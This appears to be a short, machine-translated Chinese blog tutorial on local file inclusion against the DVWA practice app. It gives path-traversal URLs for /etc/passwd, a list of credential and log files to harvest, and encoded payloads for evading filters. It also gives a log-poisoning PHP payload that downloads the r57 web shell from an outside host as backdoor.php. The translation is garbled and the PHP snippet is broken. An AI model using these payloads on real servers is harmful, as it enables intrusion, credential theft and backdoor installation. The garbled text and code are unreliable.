远程包含

 本地文件包含或LFI是一个漏洞或弱点,允许攻击者注入某网站上的目录遍历字符。发生这种情况时不消毒,这里是一个该死的网络易受攻击的应用程序的示例代码页:

<?php

     $file $_GET['page']; //The page we wish to display 

?>

这里是脆弱示例链接:http://127.0.0.1/vulnerabilities/fi/?page=include.php

现在,让我们尝试做一个目录遍历Web服务器的passwd文件: http://127.0.0.1/vulnerabilities/fi/?page=/etc/passwd

可用于信息收集

/etc/environment
/etc/shadow
/etc/sudoers
/etc/group
/etc/resolv.conf
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
/var/log/messages
var/log/mysql.log
/var/log/user.log
/var/www/logs/error_log

有许多方法来利用一个Web服务器,攻击者可以注入的httpd日志,一个PHP代码或一个后门,并通过LFI再次访问:

/var/log/apache/error_log
/apache/logs/access.log
var/log/error.log

/ *and many more* / 
他人也可以使用一个Firefox插件用户代理切换,并产生一个壳:        
<?exec('wget http://www.localroot.ph/r57.txt -O backdoor.php');?>

有些管理员可能会做一些过滤,以防止普通LFI攻击的,所以我们要做的是一个或多个字符在浏览器输入进行解码,但PHP不为十六进制编码。例如输入:

http://127.0.0.1/vulnerabilities/fi/?page=%2Fvar%2Flog%2Fmessages
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fresolv.conf
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fpasswd 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值